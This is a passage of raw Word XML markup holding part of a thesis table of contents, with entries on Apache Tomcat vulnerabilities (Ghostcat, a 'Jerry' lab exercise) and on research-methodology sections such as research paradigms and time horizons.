              <w:t>Ghostcat – CVE-2020-1938</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc113190713 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>49</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="5E42AB56" w14:textId="5A15F9A3" w:rsidR="00F93DB2" w:rsidRDefault="00F93DB2">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:sz w:val="22"/>
              <w:szCs w:val="22"/>
              <w:lang w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc113190714" w:history="1">
            <w:r w:rsidRPr="00103095">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>2.10</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
                <w:noProof/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00103095">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Jerry with MSFvenom on Apache Tomcat</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc113190714 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>51</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="3EB3F508" w14:textId="5ECF36D2" w:rsidR="00F93DB2" w:rsidRDefault="00F93DB2">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:sz w:val="22"/>
              <w:szCs w:val="22"/>
              <w:lang w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc113190715" w:history="1">
            <w:r w:rsidRPr="00103095">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t xml:space="preserve">2.10 </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
                <w:noProof/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00103095">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Literature Conclusion</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc113190715 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>52</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="18CC183D" w14:textId="50715C55" w:rsidR="00F93DB2" w:rsidRDefault="00F93DB2">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:sz w:val="22"/>
              <w:szCs w:val="22"/>
              <w:lang w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc113190716" w:history="1">
            <w:r w:rsidRPr="00103095">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>CHAPTER 3: RESEARCH METHODOLOGY</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc113190716 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>53</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="68CA97F3" w14:textId="78148671" w:rsidR="00F93DB2" w:rsidRDefault="00F93DB2">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:sz w:val="22"/>
              <w:szCs w:val="22"/>
              <w:lang w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc113190717" w:history="1">
            <w:r w:rsidRPr="00103095">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.1</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
                <w:noProof/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00103095">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Introduction: Research Overview</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc113190717 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>53</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="3F344388" w14:textId="02DF3F18" w:rsidR="00F93DB2" w:rsidRDefault="00F93DB2">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:sz w:val="22"/>
              <w:szCs w:val="22"/>
              <w:lang w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc113190718" w:history="1">
            <w:r w:rsidRPr="00103095">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.2</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
                <w:noProof/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00103095">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Research Approach</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc113190718 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>53</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="530F94B8" w14:textId="410B5A26" w:rsidR="00F93DB2" w:rsidRDefault="00F93DB2">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:sz w:val="22"/>
              <w:szCs w:val="22"/>
              <w:lang w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc113190719" w:history="1">
            <w:r w:rsidRPr="00103095">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.3</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
                <w:noProof/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00103095">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Research Paradigm</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc113190719 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>54</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="17C9284B" w14:textId="6288C855" w:rsidR="00F93DB2" w:rsidRDefault="00F93DB2">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:sz w:val="22"/>
              <w:szCs w:val="22"/>
              <w:lang w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc113190720" w:history="1">
            <w:r w:rsidRPr="00103095">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.3.1</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
                <w:noProof/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00103095">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Postpositivist Worldview</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc113190720 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>55</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="1B1B89BC" w14:textId="12416FFC" w:rsidR="00F93DB2" w:rsidRDefault="00F93DB2">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:sz w:val="22"/>
              <w:szCs w:val="22"/>
              <w:lang w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc113190721" w:history="1">
            <w:r w:rsidRPr="00103095">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.3.2</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
                <w:noProof/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00103095">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Constructivist Worldview</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc113190721 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>55</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="0A7FA587" w14:textId="61126B34" w:rsidR="00F93DB2" w:rsidRDefault="00F93DB2">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:sz w:val="22"/>
              <w:szCs w:val="22"/>
              <w:lang w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc113190722" w:history="1">
            <w:r w:rsidRPr="00103095">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.3.3</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
                <w:noProof/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00103095">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>The Transformative Worldview</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc113190722 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>56</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="5DFDD04F" w14:textId="1156EF7A" w:rsidR="00F93DB2" w:rsidRDefault="00F93DB2">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:sz w:val="22"/>
              <w:szCs w:val="22"/>
              <w:lang w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc113190723" w:history="1">
            <w:r w:rsidRPr="00103095">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.3.4</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
                <w:noProof/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00103095">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>The Pragmatic Worldview</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc113190723 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>56</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="6D2D3D3D" w14:textId="5D8B7150" w:rsidR="00F93DB2" w:rsidRDefault="00F93DB2">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:sz w:val="22"/>
              <w:szCs w:val="22"/>
              <w:lang w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc113190724" w:history="1">
            <w:r w:rsidRPr="00103095">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.4</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
                <w:noProof/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00103095">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Time Horizon</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc113190724 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>56</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="7B93457E" w14:textId="1B78D963" w:rsidR="00F93DB2" w:rsidRDefault="00F93DB2">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:sz w:val="22"/>
              <w:szCs w:val="22"/>
              <w:lang w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc113190725" w:history="1">
            <w:r w:rsidRPr="00103095">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.4.1</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
                <w:noProof/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00103095">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Longitudinal Studies</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc113190725 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>56</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="5BDDE82F" w14:textId="15BCFCDD" w:rsidR="00F93DB2" w:rsidRDefault="00F93DB2">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:sz w:val="22"/>
              <w:szCs w:val="22"/>
              <w:lang w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc113190726" w:history="1">
            <w:r w:rsidRPr="00103095">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.4.2</w:t>
            </w:r>
            <w:r>
              <w:rPr>
